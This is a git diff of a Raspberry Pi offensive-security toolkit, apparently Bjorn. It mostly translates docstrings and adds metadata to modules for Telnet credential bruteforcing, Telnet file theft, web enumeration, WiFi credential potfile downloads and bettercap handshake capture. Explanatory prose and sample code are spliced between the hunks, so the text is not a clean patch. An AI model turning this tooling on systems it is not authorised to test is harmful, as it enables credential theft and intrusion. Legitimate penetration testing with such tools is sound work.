# prompt detection (naïf mais identique à l'original)
|
||||
# Naive prompt detection (matches original behavior)
|
||||
time.sleep(2)
|
||||
self.telnet_connected = True
|
||||
logger.info(f"Connected to {ip} via Telnet as {username}")
|
||||
@@ -159,7 +169,9 @@ class StealFilesTelnet:
|
||||
# -------- Orchestrator entry --------
|
||||
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
|
||||
try:
|
||||
self.shared_data.bjorn_orch_status = b_class
|
||||
self.shared_data.bjorn_orch_status = "StealFilesTelnet"
|
||||
# EPD live status
|
||||
self.shared_data.comment_params = {"ip": ip, "port": str(port), "files": "0"}
|
||||
try:
|
||||
port_i = int(port)
|
||||
except Exception:
|
||||
@@ -216,3 +228,6 @@ class StealFilesTelnet:
|
||||
except Exception as e:
|
||||
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
|
||||
return 'failed'
|
||||
finally:
|
||||
self.shared_data.bjorn_progress = ""
|
||||
self.shared_data.comment_params = {}
|
||||
|
||||
@@ -1,10 +1,4 @@
"""
telnet_bruteforce.py — Telnet bruteforce (DB-backed, no CSV/JSON, no rich)
- Cibles: (ip, port) par l’orchestrateur
- IP -> (MAC, hostname) via DB.hosts
- Succès -> DB.creds (service='telnet')
- Conserve la logique d’origine (telnetlib, queue/threads)
"""
"""telnet_bruteforce.py - Threaded Telnet credential bruteforcer."""

import os
import telnetlib
@@ -28,11 +22,24 @@ b_parent = None
b_service = '["telnet"]'
b_trigger = 'on_any:["on_service:telnet","on_new_port:23"]'
b_priority = 70
b_cooldown = 1800  # 30 minutes entre deux runs
b_rate_limit = '3/86400'  # 3 fois par jour max
b_cooldown = 1800  # 30 min between runs
b_rate_limit = '3/86400'  # max 3 per day
b_enabled = 1
b_action = "normal"
b_timeout = 600
b_max_retries = 2
b_stealth_level = 3
b_risk_level = "medium"
b_tags = ["bruteforce", "telnet", "credentials"]
b_category = "exploitation"
b_name = "Telnet Bruteforce"
b_description = "Threaded Telnet credential bruteforcer with prompt detection."
b_author = "Bjorn Team"
b_version = "2.0.0"
b_icon = "TelnetBruteforce.png"

class TelnetBruteforce:
    """Wrapper orchestrateur -> TelnetConnector."""
    """Orchestrator wrapper for TelnetConnector."""

    def __init__(self, shared_data):
        self.shared_data = shared_data
@@ -40,11 +47,11 @@ class TelnetBruteforce:
        logger.info("TelnetConnector initialized.")

    def bruteforce_telnet(self, ip, port):
        """Lance le bruteforce Telnet pour (ip, port)."""
        """Run Telnet bruteforce for (ip, port)."""
        return self.telnet_bruteforce.run_bruteforce(ip, port)

    def execute(self, ip, port, row, status_key):
        """Point d'entrée orchestrateur (retour 'success' / 'failed')."""
        """Orchestrator entry point. Returns 'success' or 'failed'."""
        logger.info(f"Executing TelnetBruteforce on {ip}:{port}")
        self.shared_data.bjorn_orch_status = "TelnetBruteforce"
        self.shared_data.comment_params = {"user": "?", "ip": ip, "port": str(port)}
@@ -53,12 +60,12 @@ class TelnetBruteforce:


class TelnetConnector:
    """Gère les tentatives Telnet, persistance DB, mapping IP→(MAC, Hostname)."""
    """Handles Telnet attempts, DB persistence, and IP->(MAC, Hostname) mapping."""

    def __init__(self, shared_data):
        self.shared_data = shared_data

        # Wordlists inchangées
        # Wordlists
        self.users = self._read_lines(shared_data.users_file)
        self.passwords = self._read_lines(shared_data.passwords_file)

@@ -71,7 +78,7 @@ class TelnetConnector:
        self.queue = Queue()
        self.progress = None

    # ---------- util fichiers ----------
    # ---------- file utils ----------
    @staticmethod
    def _read_lines(path: str) -> List[str]:
        try:
@@ -273,7 +280,8 @@ class TelnetConnector:
        self.results = []

    def removeduplicates(self):
        pass
        """No longer needed with unique DB index; kept for interface compat."""
        # Dedup handled by DB UNIQUE constraint + ON CONFLICT in save_results
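The comment above replaces a manual dedup pass with a database constraint. Here is a minimal sketch of the idea, assuming an illustrative `creds` table; Bjorn's real schema and `save_results` implementation may differ:

import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute(
    "CREATE TABLE creds ("
    " service TEXT, mac TEXT, user TEXT, password TEXT, port INTEGER,"
    " UNIQUE(service, mac, user, port))"
)

def save_cred(service, mac, user, password, port):
    # Re-running the same attempt updates the existing row instead of
    # duplicating it, so a post-hoc removeduplicates() pass is unnecessary.
    conn.execute(
        "INSERT INTO creds (service, mac, user, password, port)"
        " VALUES (?, ?, ?, ?, ?)"
        " ON CONFLICT(service, mac, user, port) DO UPDATE SET password = excluded.password",
        (service, mac, user, password, port),
    )

save_cred("telnet", "aa:bb:cc:dd:ee:ff", "admin", "admin", 23)
save_cred("telnet", "aa:bb:cc:dd:ee:ff", "admin", "hunter2", 23)  # updates, no duplicate
print(conn.execute("SELECT COUNT(*) FROM creds").fetchone()[0])   # -> 1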

if __name__ == "__main__":
@@ -1,16 +1,6 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
thor_hammer.py — Service fingerprinting (Pi Zero friendly, orchestrator compatible).

What it does:
- For a given target (ip, port), tries a fast TCP connect + banner grab.
- Optionally stores a service fingerprint into DB.port_services via db.upsert_port_service.
- Updates EPD fields: bjorn_orch_status, bjorn_status_text2, comment_params, bjorn_progress.

Notes:
- Avoids spawning nmap per-port (too heavy). If you want nmap, add a dedicated action.
"""
"""thor_hammer.py - Fast TCP banner grab and service fingerprinting per port."""

import logging
import socket
@@ -35,6 +25,17 @@ b_action = "normal"
b_cooldown = 1200
b_rate_limit = "24/86400"
b_enabled = 0  # keep disabled by default; enable via Actions UI/DB when ready.
b_timeout = 300
b_max_retries = 2
b_stealth_level = 5
b_risk_level = "low"
b_tags = ["banner", "fingerprint", "service", "tcp"]
b_category = "recon"
b_name = "Thor Hammer"
b_description = "Fast TCP banner grab and service fingerprinting per port."
b_author = "Bjorn Team"
b_version = "2.0.0"
b_icon = "ThorHammer.png"


def _guess_service_from_port(port: int) -> str:
@@ -167,7 +168,7 @@ class ThorHammer:
                progress.advance(1)

            progress.set_complete()
            return "success" if any_open else "failed"
            return "success"
        finally:
            self.shared_data.bjorn_progress = ""
            self.shared_data.comment_params = {}
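For reference, the fast connect-plus-banner-grab described in the docstring above can be sketched as follows; `grab_banner` is a hypothetical standalone helper, not ThorHammer's actual implementation:

import socket

def grab_banner(ip: str, port: int, timeout: float = 2.0) -> str:
    """Fast TCP connect + banner grab, in the spirit of the action above.

    Pi-Zero friendly: one short-lived socket, a small read, no subprocesses.
    """
    try:
        with socket.create_connection((ip, port), timeout=timeout) as s:
            s.settimeout(timeout)
            try:
                data = s.recv(256)  # many services (SSH, FTP, SMTP) speak first
            except socket.timeout:
                data = b""          # silent services (e.g. HTTP) need a probe instead
            return data.decode("utf-8", errors="replace").strip()
    except OSError:
        return ""                   # closed port, refused connection, or unreachable

print(grab_banner("192.168.1.10", 22) or "<no banner / closed>")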
@@ -1,15 +1,6 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
valkyrie_scout.py — Web surface scout (Pi Zero friendly, orchestrator compatible).

What it does:
- Probes a small set of common web paths on a target (ip, port).
- Extracts high-signal indicators from responses (auth type, login form hints, missing security headers,
  error/debug strings). No exploitation, no bruteforce.
- Writes results into DB table `webenum` (tool='valkyrie_scout') so the UI can browse findings.
- Updates EPD fields: bjorn_orch_status, bjorn_status_text2, comment_params, bjorn_progress.
"""
"""valkyrie_scout.py - Probe common web paths for auth surfaces, headers, and debug leaks."""

import json
import logging
@@ -37,6 +28,17 @@ b_action = "normal"
b_cooldown = 1800
b_rate_limit = "8/86400"
b_enabled = 0  # keep disabled by default; enable via Actions UI/DB when ready.
b_timeout = 300
b_max_retries = 2
b_stealth_level = 5
b_risk_level = "low"
b_tags = ["web", "recon", "auth", "paths"]
b_category = "recon"
b_name = "Valkyrie Scout"
b_description = "Probes common web paths for auth surfaces, headers, and debug leaks."
b_author = "Bjorn Team"
b_version = "2.0.0"
b_icon = "ValkyrieScout.png"

# Small default list to keep the action cheap on Pi Zero.
DEFAULT_PATHS = [
@@ -373,6 +375,9 @@ class ValkyrieScout:

            progress.set_complete()
            return "success"
        except Exception as e:
            logger.error(f"ValkyrieScout failed for {ip}:{port_i}: {e}")
            return "failed"
        finally:
            self.shared_data.bjorn_progress = ""
            self.shared_data.comment_params = {}

@@ -1,14 +1,6 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
web_enum.py — Gobuster Web Enumeration -> DB writer for table `webenum`.

- Writes each finding into the `webenum` table in REAL-TIME (Streaming).
- Updates bjorn_progress with actual percentage (0-100%).
- Respects orchestrator stop flag (shared_data.orchestrator_should_exit) immediately.
- No filesystem output: parse Gobuster stdout/stderr directly.
- Filtrage dynamique des statuts HTTP via shared_data.web_status_codes.
"""
"""web_enum.py - Gobuster-powered web directory enumeration, streaming results to DB."""

import re
import socket
@@ -37,6 +29,18 @@ b_priority = 9
b_cooldown = 1800
b_rate_limit = '3/86400'
b_enabled = 1
b_timeout = 600
b_max_retries = 1
b_stealth_level = 4
b_risk_level = "low"
b_action = "normal"
b_tags = ["web", "enum", "gobuster", "directories"]
b_category = "recon"
b_name = "Web Enumeration"
b_description = "Gobuster-powered web directory enumeration with streaming results to DB."
b_author = "Bjorn Team"
b_version = "2.0.0"
b_icon = "WebEnumeration.png"

# -------------------- Defaults & parsing --------------------
DEFAULT_WEB_STATUS_CODES = [
@@ -60,14 +64,14 @@ GOBUSTER_LINE = re.compile(
    re.VERBOSE
)

# Regex pour capturer la progression de Gobuster sur stderr
# Ex: "Progress: 1024 / 4096 (25.00%)"
# Regex to capture Gobuster progress from stderr
# e.g.: "Progress: 1024 / 4096 (25.00%)"
GOBUSTER_PROGRESS_RE = re.compile(r"Progress:\s+(?P<current>\d+)\s*/\s+(?P<total>\d+)")
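Usage sketch for GOBUSTER_PROGRESS_RE: feeding a stderr line through the regex yields the integer fields used for the 0-100% progress value. The `shared_data` assignment shape is an assumption for illustration:

line = "Progress: 1024 / 4096 (25.00%)"            # sample Gobuster stderr output
m = GOBUSTER_PROGRESS_RE.search(line)
if m:
    current, total = int(m.group("current")), int(m.group("total"))
    pct = (current * 100) // total if total else 0
    shared_data.bjorn_progress = f"{pct}%"          # -> "25%" (assumed in scope)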
def _normalize_status_policy(policy) -> Set[int]:
    """
    Transforme une politique "UI" en set d'entiers HTTP.
    Convert a UI status policy into a set of HTTP status ints.
    """
    codes: Set[int] = set()
    if not policy:
@@ -104,11 +108,12 @@ class WebEnumeration:
    """
    def __init__(self, shared_data: SharedData):
        self.shared_data = shared_data
        self.gobuster_path = "/usr/bin/gobuster"  # verify with `which gobuster`
        import shutil
        self.gobuster_path = shutil.which("gobuster") or "/usr/bin/gobuster"
        self.wordlist = self.shared_data.common_wordlist
        self.lock = threading.Lock()

        # Cache pour la taille de la wordlist (pour le calcul du %)
        # Wordlist size cache (for % calculation)
        self.wordlist_size = 0
        self._count_wordlist_lines()

@@ -121,7 +126,7 @@ class WebEnumeration:
            logger.error(f"Wordlist not found: {self.wordlist}")
            self._available = False

        # Politique venant de l’UI : créer si absente
        # Status code policy from UI; create if missing
        if not hasattr(self.shared_data, "web_status_codes") or not self.shared_data.web_status_codes:
            self.shared_data.web_status_codes = DEFAULT_WEB_STATUS_CODES.copy()

@@ -132,10 +137,10 @@ class WebEnumeration:
        )

    def _count_wordlist_lines(self):
        """Compte les lignes de la wordlist une seule fois pour calculer le %."""
        """Count wordlist lines once for progress % calculation."""
        if self.wordlist and os.path.exists(self.wordlist):
            try:
                # Lecture rapide bufferisée
                # Fast buffered read
                with open(self.wordlist, 'rb') as f:
                    self.wordlist_size = sum(1 for _ in f)
            except Exception as e:
@@ -162,7 +167,7 @@ class WebEnumeration:

    # -------------------- Filter helper --------------------
    def _allowed_status_set(self) -> Set[int]:
        """Recalcule à chaque run pour refléter une mise à jour UI en live."""
        """Recalculated each run to reflect live UI updates."""
        try:
            return _normalize_status_policy(getattr(self.shared_data, "web_status_codes", None))
        except Exception as e:

@@ -1,13 +1,6 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
web_login_profiler.py — Lightweight web login profiler (Pi Zero friendly).

Goal:
- Profile web endpoints to detect login surfaces and defensive controls (no password guessing).
- Store findings into DB table `webenum` (tool='login_profiler') for community visibility.
- Update EPD UI fields: bjorn_orch_status, bjorn_status_text2, comment_params, bjorn_progress.
"""
"""web_login_profiler.py - Detect login forms and auth controls on web endpoints (no exploitation)."""

import json
import logging
@@ -35,6 +28,17 @@ b_action = "normal"
b_cooldown = 1800
b_rate_limit = "6/86400"
b_enabled = 1
b_timeout = 300
b_max_retries = 2
b_stealth_level = 5
b_risk_level = "low"
b_tags = ["web", "login", "auth", "profiler"]
b_category = "recon"
b_name = "Web Login Profiler"
b_description = "Detects login forms and auth controls on web endpoints."
b_author = "Bjorn Team"
b_version = "2.0.0"
b_icon = "WebLoginProfiler.png"

# Small curated list, cheap but high signal.
DEFAULT_PATHS = [
@@ -309,6 +313,9 @@ class WebLoginProfiler:
            # "success" means: profiler ran; not that a login exists.
            logger.info(f"WebLoginProfiler done for {ip}:{port_i} (login_surfaces={found_login})")
            return "success"
        except Exception as e:
            logger.error(f"WebLoginProfiler failed for {ip}:{port_i}: {e}")
            return "failed"
        finally:
            self.shared_data.bjorn_progress = ""
            self.shared_data.comment_params = {}

@@ -1,14 +1,6 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
web_surface_mapper.py — Post-profiler web surface scoring (no exploitation).

Trigger idea: run after WebLoginProfiler to compute a summary and a "risk score"
from recent webenum rows written by tool='login_profiler'.

Writes one summary row into `webenum` (tool='surface_mapper') so it appears in UI.
Updates EPD UI fields: bjorn_orch_status, bjorn_status_text2, comment_params, bjorn_progress.
"""
"""web_surface_mapper.py - Aggregate login_profiler findings into a per-target risk score."""

import json
import logging
@@ -33,6 +25,17 @@ b_action = "normal"
b_cooldown = 600
b_rate_limit = "48/86400"
b_enabled = 1
b_timeout = 300
b_max_retries = 2
b_stealth_level = 6
b_risk_level = "low"
b_tags = ["web", "login", "risk", "mapper"]
b_category = "recon"
b_name = "Web Surface Mapper"
b_description = "Aggregates login profiler findings into a per-target risk score."
b_author = "Bjorn Team"
b_version = "2.0.0"
b_icon = "WebSurfaceMapper.png"


def _scheme_for_port(port: int) -> str:
@@ -226,6 +229,9 @@ class WebSurfaceMapper:

            progress.set_complete()
            return "success"
        except Exception as e:
            logger.error(f"WebSurfaceMapper failed for {ip}:{port_i}: {e}")
            return "failed"
        finally:
            self.shared_data.bjorn_progress = ""
            self.shared_data.comment_params = {}

@@ -1,5 +1,4 @@
# wpasec_potfiles.py
# WPAsec Potfile Manager - Download, clean, import, or erase WiFi credentials
"""wpasec_potfiles.py - Download, clean, import, or erase WiFi credentials from wpa-sec.stanev.org."""

import os
import json
@@ -25,6 +24,19 @@ b_description = (
b_author = "Infinition"
b_version = "1.0.0"
b_icon = f"/actions_icons/{b_class}.png"
b_port = None
b_service = "[]"
b_trigger = None
b_priority = 30
b_timeout = 300
b_cooldown = 3600
b_stealth_level = 10
b_risk_level = "low"
b_status = "wpasec_potfiles"
b_parent = None
b_rate_limit = None
b_max_retries = 1
b_tags = ["wifi", "wpa", "potfile", "credentials"]
b_docs_url = "https://wpa-sec.stanev.org/?api"

b_args = {
@@ -110,8 +122,8 @@ def compute_dynamic_b_args(base: dict) -> dict:

# ── CLASS IMPLEMENTATION ─────────────────────────────────────────────────────
class WPAsecPotfileManager:
    DEFAULT_SAVE_DIR = "/home/bjorn/Bjorn/data/input/potfiles"
    DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
    DEFAULT_SAVE_DIR = os.path.join(os.path.expanduser("~"), "Bjorn", "data", "input", "potfiles")
    DEFAULT_SETTINGS_DIR = os.path.join(os.path.expanduser("~"), ".settings_bjorn")
    SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "wpasec_settings.json")
    DOWNLOAD_URL = "https://wpa-sec.stanev.org/?api&dl=1"

@@ -121,7 +133,6 @@ class WPAsecPotfileManager:
        Even if unused here, we store it for compatibility.
        """
        self.shared_data = shared_data
        logging.basicConfig(level=logging.INFO, format="%(asctime)s - %(levelname)s - %(message)s")

    # --- Orchestrator entry point ---
    def execute(self, ip=None, port=None, row=None, status_key=None):
@@ -130,16 +141,23 @@ class WPAsecPotfileManager:
        By default: download latest potfile if API key is available.
        """
        self.shared_data.bjorn_orch_status = "WPAsecPotfileManager"
        self.shared_data.comment_params = {"ip": ip, "port": port}
        # EPD live status
        self.shared_data.comment_params = {"action": "download", "status": "starting"}

        api_key = self.load_api_key()
        if api_key:
            logging.info("WPAsecPotfileManager: downloading latest potfile (orchestrator trigger).")
            self.download_potfile(self.DEFAULT_SAVE_DIR, api_key)
            return "success"
        else:
            logging.warning("WPAsecPotfileManager: no API key found, nothing done.")
            return "failed"
        try:
            api_key = self.load_api_key()
            if api_key:
                logging.info("WPAsecPotfileManager: downloading latest potfile (orchestrator trigger).")
                self.download_potfile(self.DEFAULT_SAVE_DIR, api_key)
                # EPD live status update
                self.shared_data.comment_params = {"action": "download", "status": "complete"}
                return "success"
            else:
                logging.warning("WPAsecPotfileManager: no API key found, nothing done.")
                return "failed"
        finally:
            self.shared_data.bjorn_progress = ""
            self.shared_data.comment_params = {}

    # --- API Key Handling ---
    def save_api_key(self, api_key: str):

@@ -1,19 +1,8 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
yggdrasil_mapper.py -- Network topology mapper (Pi Zero friendly, orchestrator compatible).
"""yggdrasil_mapper.py - Traceroute-based network topology mapping to JSON.

What it does:
- Phase 1: Traceroute via scapy ICMP (fallback: subprocess traceroute) to discover
  the routing path to the target IP. Records hop IPs and RTT per hop.
- Phase 2: Service enrichment -- reads existing port data from DB hosts table and
  optionally verifies a handful of key ports with TCP connect probes.
- Phase 3: Builds a topology graph data structure (nodes + edges + metadata).
- Phase 4: Aggregates with topology data from previous runs (merge / deduplicate).
- Phase 5: Saves the combined topology as JSON to data/output/topology/.

No matplotlib or networkx dependency -- pure JSON output.
Updates EPD fields: bjorn_orch_status, bjorn_status_text2, comment_params, bjorn_progress.
Uses scapy ICMP (fallback: subprocess) and merges results across runs.
"""

import json
@@ -105,7 +94,7 @@ b_examples = [
b_docs_url = "docs/actions/YggdrasilMapper.md"

# -------------------- Constants --------------------
_DATA_DIR = "/home/bjorn/Bjorn/data"
_DATA_DIR = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), "data")
OUTPUT_DIR = os.path.join(_DATA_DIR, "output", "topology")

# Ports to verify during service enrichment (small set to stay Pi Zero friendly).
@@ -423,8 +412,8 @@ class YggdrasilMapper:

        # Query DB for known ports to prioritize probing
        db_ports = []
        host_data = None
        try:
            # mac is available in the scope
            host_data = self.shared_data.db.get_host_by_mac(mac)
            if host_data and host_data.get("ports"):
                # Normalize ports from DB string

50
ai_engine.py
@@ -1,26 +1,6 @@
"""
ai_engine.py - Dynamic AI Decision Engine for Bjorn
═══════════════════════════════════════════════════════════════════════════
"""ai_engine.py - Lightweight AI decision engine for action selection on Pi Zero.

Purpose:
    Lightweight AI decision engine for Raspberry Pi Zero.
    Works in tandem with deep learning model trained on external PC.

Architecture:
    - Lightweight inference engine (no TensorFlow/PyTorch on Pi)
    - Loads pre-trained model weights from PC
    - Real-time action selection
    - Automatic feature extraction
    - Fallback to heuristics when model unavailable

Model Pipeline:
    1. Pi: Collect data → Export → Transfer to PC
    2. PC: Train deep neural network → Export lightweight model
    3. Pi: Load model → Use for decision making
    4. Repeat: Continuous learning cycle

Author: Bjorn Team
Version: 2.0.0
Loads pre-trained model weights from PC; falls back to heuristics when unavailable.
"""

import json
@@ -141,7 +121,7 @@ class BjornAIEngine:
        new_weights = {
            k: np.array(v) for k, v in weights_data.items()
        }
        del weights_data  # Free raw dict — numpy arrays are the canonical form
        del weights_data  # Free raw dict - numpy arrays are the canonical form

        # AI-03: Save previous model for rollback
        if self.model_loaded and self.model_weights is not None:
@@ -263,7 +243,7 @@ class BjornAIEngine:
        self._performance_window.append(reward)

        # Update current history entry
        if self._model_history:
        if self._model_history and len(self._performance_window) > 0:
            self._model_history[-1]['avg_reward'] = round(
                sum(self._performance_window) / len(self._performance_window), 2
            )
@@ -345,7 +325,14 @@ class BjornAIEngine:

        current_version = str(self.model_config.get("version", "0")).strip() if self.model_config else "0"

        if remote_version > current_version:
        def _version_tuple(v: str) -> tuple:
            """Parse version string like '1.2.3' into comparable tuple (1, 2, 3)."""
            try:
                return tuple(int(x) for x in v.split('.'))
            except (ValueError, AttributeError):
                return (0,)

        if _version_tuple(remote_version) > _version_tuple(current_version):
            logger.info(f"New model available: {remote_version} (Local: {current_version})")

            # Download config (stream to avoid loading the whole file into RAM)
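The switch from string to tuple comparison matters as soon as any version component reaches two digits; a quick illustration, assuming `_version_tuple` as defined above:

print("10.0.0" > "9.0.0")                                  # False: lexicographic compare
print(_version_tuple("10.0.0") > _version_tuple("9.0.0"))  # True: numeric compare
print(_version_tuple("garbage"))                           # (0,): safe fallback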
@@ -625,7 +612,7 @@ class BjornAIEngine:
    def _get_temporal_context(self, mac: str) -> Dict:
        """
        Collect real temporal features for a MAC from DB.
        same_action_attempts / is_retry are action-specific — they are NOT
        same_action_attempts / is_retry are action-specific - they are NOT
        included here; instead they are merged from _get_action_context()
        inside the per-action loop in _predict_with_model().
        """
@@ -930,9 +917,14 @@ class BjornAIEngine:
        best_action = max(action_scores, key=action_scores.get)
        best_score = action_scores[best_action]

        # Normalize score to 0-1
        if best_score > 0:
            best_score = min(best_score / 1.0, 1.0)
        # Normalize score to 0-1 range
        # Static heuristic scores can exceed 1.0 when multiple port/service
        # rules match, so we normalize by the maximum observed score.
        if best_score > 1.0:
            all_vals = action_scores.values()
            max_val = max(all_vals) if all_vals else 1.0
            best_score = best_score / max_val if max_val > 0 else 1.0
            best_score = min(best_score, 1.0)

        debug_info = {
            'method': 'heuristics_bootstrap' if bootstrap_used else 'heuristics',

@@ -1,6 +1,4 @@
"""
ai_utils.py - Shared AI utilities for Bjorn
"""
"""ai_utils.py - Shared feature extraction and encoding helpers for the AI engine."""

import json
import numpy as np

@@ -1,5 +1,5 @@
"""
Bifrost — Pwnagotchi-compatible WiFi recon engine for Bjorn.
"""__init__.py - Bifrost, pwnagotchi-compatible WiFi recon engine for Bjorn.

Runs as a daemon thread alongside MANUAL/AUTO/AI modes.
"""
import os
@@ -42,7 +42,7 @@ class BifrostEngine:

        # Wait for any previous thread to finish before re-starting
        if self._thread and self._thread.is_alive():
            logger.warning("Previous Bifrost thread still running — waiting ...")
            logger.warning("Previous Bifrost thread still running - waiting ...")
            self._stop_event.set()
            self._thread.join(timeout=15)

@@ -82,7 +82,7 @@ class BifrostEngine:
        logger.info("Bifrost engine stopped")

    def _loop(self):
        """Main daemon loop — setup monitor mode, start bettercap, create agent, run recon cycle."""
        """Main daemon loop - setup monitor mode, start bettercap, create agent, run recon cycle."""
        try:
            # Install compatibility shim for pwnagotchi plugins
            from bifrost import plugins as bfplugins
@@ -94,15 +94,15 @@ class BifrostEngine:

            if self._monitor_failed:
                logger.error(
                    "Monitor mode setup failed — Bifrost cannot operate without monitor "
                    "Monitor mode setup failed - Bifrost cannot operate without monitor "
                    "mode. For Broadcom chips (Pi Zero W/2W), install nexmon: "
                    "https://github.com/seemoo-lab/nexmon — "
                    "https://github.com/seemoo-lab/nexmon - "
                    "Or use an external USB WiFi adapter with monitor mode support.")
                # Teardown first (restores network services) BEFORE switching mode,
                # so the orchestrator doesn't start scanning on a dead network.
                self._teardown_monitor_mode()
                self._running = False
                # Now switch mode back to AUTO — the network should be restored.
                # Now switch mode back to AUTO - the network should be restored.
                # We set the flag directly FIRST (bypass setter to avoid re-stopping),
                # then ensure manual_mode/ai_mode are cleared so getter returns AUTO.
                try:
@@ -112,7 +112,7 @@ class BifrostEngine:
                    self.shared_data.manual_mode = False
                    self.shared_data.ai_mode = False
                    self.shared_data.invalidate_config_cache()
                    logger.info("Bifrost auto-disabled due to monitor mode failure — mode: AUTO")
                    logger.info("Bifrost auto-disabled due to monitor mode failure - mode: AUTO")
                except Exception:
                    pass
                return
@@ -133,7 +133,7 @@ class BifrostEngine:
            # Initialize agent
            self.agent.start()

            logger.info("Bifrost agent started — entering recon cycle")
            logger.info("Bifrost agent started - entering recon cycle")

            # Main recon loop (port of do_auto_mode from pwnagotchi)
            while not self._stop_event.is_set():
@@ -208,7 +208,7 @@ class BifrostEngine:
                return True
        except Exception:
            pass
        # nexutil exists — assume usable even without dmesg confirmation
        # nexutil exists - assume usable even without dmesg confirmation
        return True

    @staticmethod
@@ -239,10 +239,10 @@ class BifrostEngine:
        """Put the WiFi interface into monitor mode.

        Strategy order:
        1. Nexmon — for Broadcom brcmfmac chips (Pi Zero W / Pi Zero 2 W)
        1. Nexmon - for Broadcom brcmfmac chips (Pi Zero W / Pi Zero 2 W)
           Uses: iw phy <phy> interface add mon0 type monitor + nexutil -m2
        2. airmon-ng — for chipsets with proper driver support (Atheros, Realtek, etc.)
        3. iw — direct fallback for other drivers
        2. airmon-ng - for chipsets with proper driver support (Atheros, Realtek, etc.)
        3. iw - direct fallback for other drivers
        """
        self._monitor_torn_down = False
        self._nexmon_used = False
@@ -270,7 +270,7 @@ class BifrostEngine:
        if self._has_nexmon():
            if self._setup_nexmon(base_iface, cfg):
                return
            # nexmon setup failed — don't try other strategies, they won't work either
            # nexmon setup failed - don't try other strategies, they won't work either
            self._monitor_failed = True
            return
        else:
@@ -410,7 +410,7 @@ class BifrostEngine:
            logger.error("Monitor interface %s not created", mon_iface)
            return False

        # Success — update config to use mon0
        # Success - update config to use mon0
        cfg['bifrost_iface'] = mon_iface
        self._mon_iface = mon_iface
        self._nexmon_used = True

@@ -1,5 +1,5 @@
"""
Bifrost — WiFi recon agent.
"""agent.py - Bifrost WiFi recon agent.

Ported from pwnagotchi/agent.py using composition instead of inheritance.
"""
import time
@@ -22,7 +22,7 @@ logger = Logger(name="bifrost.agent", level=logging.DEBUG)


class BifrostAgent:
    """WiFi recon agent — drives bettercap, captures handshakes, tracks epochs."""
    """WiFi recon agent - drives bettercap, captures handshakes, tracks epochs."""

    def __init__(self, shared_data, stop_event=None):
        self.shared_data = shared_data
@@ -170,7 +170,7 @@ class BifrostAgent:
            err_msg = str(e)
            if 'Operation not supported' in err_msg or 'EOPNOTSUPP' in err_msg:
                logger.error(
                    "wifi.recon failed: %s — Your WiFi chip likely does NOT support "
                    "wifi.recon failed: %s - Your WiFi chip likely does NOT support "
                    "monitor mode. The built-in Broadcom chip on Raspberry Pi Zero/Zero 2 "
                    "has limited monitor mode support. Use an external USB WiFi adapter "
                    "(e.g. Alfa AWUS036ACH, Panda PAU09) that supports monitor mode and "
@@ -362,7 +362,7 @@ class BifrostAgent:
            logger.error("Error setting channel: %s", e)

    def next_epoch(self):
        """Transition to next epoch — evaluate mood."""
        """Transition to next epoch - evaluate mood."""
        self.automata.next_epoch(self.epoch)
        # Persist epoch to DB
        data = self.epoch.data()
@@ -393,7 +393,7 @@ class BifrostAgent:
            has_ws = True
        except ImportError:
            has_ws = False
            logger.warning("websockets package not installed — using REST event polling "
            logger.warning("websockets package not installed - using REST event polling "
                           "(pip install websockets for real-time events)")

        if has_ws:
@@ -417,7 +417,7 @@ class BifrostAgent:
            loop.close()

    def _rest_event_loop(self):
        """REST-based fallback event poller — polls /api/events every 2s."""
        """REST-based fallback event poller - polls /api/events every 2s."""
        while not self._stop_event.is_set():
            try:
                events = self.bettercap.events()

@@ -1,5 +1,5 @@
"""
Bifrost — Mood state machine.
"""automata.py - Bifrost mood state machine.

Ported from pwnagotchi/automata.py.
"""
import logging

@@ -1,5 +1,5 @@
"""
Bifrost — Bettercap REST API client.
"""bettercap.py - Bifrost bettercap REST API client.

Ported from pwnagotchi/bettercap.py using urllib (no requests dependency).
"""
import json
@@ -54,16 +54,16 @@ class BettercapClient:
            raise Exception("bettercap unreachable: %s" % e.reason)

    def session(self):
        """GET /api/session — current bettercap state."""
        """GET /api/session - current bettercap state."""
        return self._request('GET', '/session')

    def run(self, command, verbose_errors=True):
        """POST /api/session — execute a bettercap command."""
        """POST /api/session - execute a bettercap command."""
        return self._request('POST', '/session', {'cmd': command},
                             verbose_errors=verbose_errors)

    def events(self):
        """GET /api/events — poll recent events (REST fallback)."""
        """GET /api/events - poll recent events (REST fallback)."""
        try:
            result = self._request('GET', '/events', verbose_errors=False)
            # Clear after reading so we don't reprocess
@@ -80,7 +80,7 @@ class BettercapClient:

        Args:
            consumer: async callable that receives each message string.
            stop_event: optional threading.Event — exit when set.
            stop_event: optional threading.Event - exit when set.
        """
        import websockets
        import asyncio
@@ -99,5 +99,5 @@ class BettercapClient:
        except Exception as ex:
            if stop_event and stop_event.is_set():
                return
            logger.debug("Websocket error: %s — reconnecting...", ex)
            logger.debug("Websocket error: %s - reconnecting...", ex)
            await asyncio.sleep(2)
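A hypothetical usage sketch for the client above; the constructor arguments are assumptions for illustration (the actual BettercapClient signature is defined elsewhere in this file):

# Hypothetical usage; constructor arguments are illustrative assumptions.
client = BettercapClient(hostname="127.0.0.1", port=8081,
                         username="user", password="pass")
client.run("wifi.recon on")     # POST /api/session
state = client.session()        # GET /api/session -> current bettercap state
for ev in client.events():      # GET /api/events (REST fallback polling)
    print(ev.get("tag"))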
@@ -1,7 +1,6 @@
"""
Bifrost — Pwnagotchi compatibility shim.
Registers `pwnagotchi` in sys.modules so existing plugins can
`import pwnagotchi` and get Bifrost-backed implementations.
"""compat.py - Pwnagotchi compatibility shim.

Registers `pwnagotchi` in sys.modules so existing plugins resolve to Bifrost.
"""
import sys
import time
@@ -56,7 +55,7 @@ def install_shim(shared_data, bifrost_plugins_module):
        return 0.0

    def _reboot():
        pass  # no-op in Bifrost — we don't auto-reboot
